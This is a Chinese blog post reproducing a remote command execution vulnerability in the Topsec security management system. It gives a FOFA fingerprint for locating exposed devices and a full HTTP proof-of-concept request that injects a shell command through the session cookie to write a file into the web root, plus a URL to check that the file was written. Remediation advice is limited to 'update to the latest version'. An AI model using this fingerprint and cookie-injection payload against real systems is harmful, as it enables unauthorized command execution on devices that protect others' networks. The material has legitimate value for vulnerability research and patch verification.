天融信TOPSEC安全管理系统存在远程命令执行漏洞

最新推荐文章于 2024-07-01 17:16:16 发布
最新推荐文章于 2024-07-01 17:16:16 发布
阅读量1.8k 收藏 9
点赞数 7
分类专栏: 漏洞复现 文章标签: 安全 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/luochen2436/article/details/135341423
版权

文章目录

产品简介

天融信TopSec 安全管理系统,是基于大数据架构,采用多种技术手段收集各类探针设备安全数据,围绕资产、漏洞、攻击、威胁等安全要素进行全面分析,提供统一监测告警、集中策略管控、协同处置流程,实现客户等保合规、资产统一管理、风险一键阻断等。

漏洞概述

安全管理系统存在存在远程命令执行漏洞,通过此漏洞,攻击者可进行文件写入等危险操作,威胁系统安全。

指纹识别

fofa:

title="Web User Login" && body="/cgi/maincgi.cgi?Url=VerifyCode"

在这里插入图片描述

漏洞利用

poc:

GET /cgi/maincgi.cgi?Url=check HTTP/1.1
Host: 10
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Cookie: session_id_443=1|echo 'hhh' >> /www/htdocs/site/image/hhh.txt;
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Dnt: 1
Upgrade-Insecure-Requests: 1
Connection: close

在这里插入图片描述
验证url:

https://you_ip/site/image/hhh.txt

在这里插入图片描述

修复建议

联系软件厂商更新至最新安全版本

【陆上行舟。】

3tefanie丶zhou
关注
  • 7
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞复现】某厂商TopSec maincgi.cgi远程命令执行漏洞
晚风不及你
03-01 556
天融信TOPSEC解决方案包括综合管理系统,各类安全产品如防火墙、VPN、安全网关、宽带管理、入侵检测、内容过滤、个人安全套件以及综合安全审计系统等多种安全功能。
天融信文档安全管理系统.pptx
08-10
天融信文档安全管理系统:全方位保障企业数据安全》 在信息化高度发达的今天,企业文档的安全性成为了企业信息安全的核心环节。天融信文档安全管理系统,以其独特的透明加密、精细权限控制和全面的解决方案,为...
天融信TOPSEC Cookie 远程命令执行漏洞
m0_71285176的博客
01-10 575
天融信TOPSEC解决方案包括综合管理系统,各类安全产品如防火墙、VPN、安全网关、宽带管理、入侵检测、内容过滤、个人安全套件以及综合安全审计系统等多种安全功能。该系统Cookie参数存在RCE漏洞,会导致服务器失陷。命令:nuclei.exe -t 选择脚本 -u 扫描地址。
解决方案-天融信防火墙mgmt-新手漏洞教程
最新发布
2401_84915584的博客
07-01 267
提供天融信防火墙配置指南文档免费下载,摘要:天融信防火墙配置指南一、对象与规则现在大多防火墙都采用了面向对象的设计。针对对象的行为进行的快速识别处理,就是规则。
漏洞复现--天融信TOPSEC两处远程命令执行
wintercc1219的博客
02-04 508
天融信TOPSEC)是国内领先的网络安全解决方案提供商之一。他们专注于网络安全技术和产品的研发、生产和服务,为政府机构、企业和个人用户提供全面的网络安全解决方案。
漏洞复现-天融信TOPSEC static_convert 远程命令执行漏洞(附漏洞检测脚本)
jjjj1029056414的博客
01-04 678
漏洞复现-天融信TOPSEC static_convert 远程命令执行漏洞,附带自己写的poc脚本
天融信TOPSEC Cookie 远程命令执行漏洞复现
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
01-04 1068
天融信TOPSEC解决方案包括综合管理系统,各类安全产品如防火墙、VPN、安全网关、宽带管理、入侵检测、内容过滤、个人安全套件以及综合安全审计系统等多种安全功能。该系统Cookie 处存在RCE漏洞,会导致服务器失陷。
多家防火墙设备存在信息泄露漏洞
weixin_50464560的博客
06-18 1872
概述 漏洞名称 多家防火墙设备存在信息泄露漏洞安全通告 发布日期 2021-06-16 受影响产品及版本 胜鑫塔下一代防火墙XT6000-A-FW-1.0.0-0-2778 利谱第二代防火墙6164-1.5.2 任子行下一代防火墙SURF-NGSA-V-3000 中科网威下一代防火墙F6600L-1.5.2 任子行网络安全审计系统内置报表 网域科技防火墙ACF-200-1.0.0 锐捷RG-ISG视频监控网关6000-ISG02C 天融信ACM-51538-V3.0.0176 无锡城安C
天融信自适应安全防御系统.pptx
03-14
自适应安全架构现状及趋势,安全建设思路的转变,自适应安全架构的安全目标,天融信对应自适应安全架构的理解与解决方案。
关于天融信文档安全管理系统的介绍说明.zip
11-07
天融信文档安全管理系统的介绍说明 文档安全管理系统是企业信息化建设中的重要组成部分,它主要针对企业内部的电子文档进行安全防护,确保敏感信息不被非法访问、泄露或篡改。天融信作为中国信息安全行业的领军企业...
【转载】漏洞复现--天融信TOPSEC两处远程命令执行
maoxiaotao的博客
02-04 100
天融信TOPSEC)是国内领先的网络安全解决方案提供商之一。他们专注于网络安全技术和产品的研发、生产和服务,为政府机构、企业和个人用户提供全面的网络安全解决方案。
change lan.php lanid,天融信负载均衡本地文件包含漏洞
weixin_29094775的博客
03-18 219
本地文件包含:漏洞说明:出入的地方:在change_lan.php传入会话变量。error_reporting(E_ALL ^ E_WARNING ^ E_NOTICE);include_once dirname(__FILE__)."/acc/common/config/item/configItem.inc";require_once dirname(__FILE__)."/acc/commo...
漏洞复现】天融信TOPSEC-static-convert-远程命令执行
知黑而守白
01-04 202
攻击者通过发送精心构造的恶意请求,利用了该漏洞,成功实现在目标系统上执行任意系统命令的攻击。成功利用漏洞的攻击者可在目标系统上执行恶意操作,可能导致数据泄露、系统瘫痪或远程控制。强烈建议立即更新系统以修复此漏洞,确保系统安全性。天融信TOPSEC解决方案包括综合管理系统,各类安全产品如防火墙、VPN、安全网关、宽带管理、入侵检测、内容过滤、个人安全套件以及综合安全审计系统等多种安全功能。更新至最新版本:确保你的系统版本处于最新状态。厂商通常会发布包含安全修复的更新,及时应用这些更新以确保系统的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值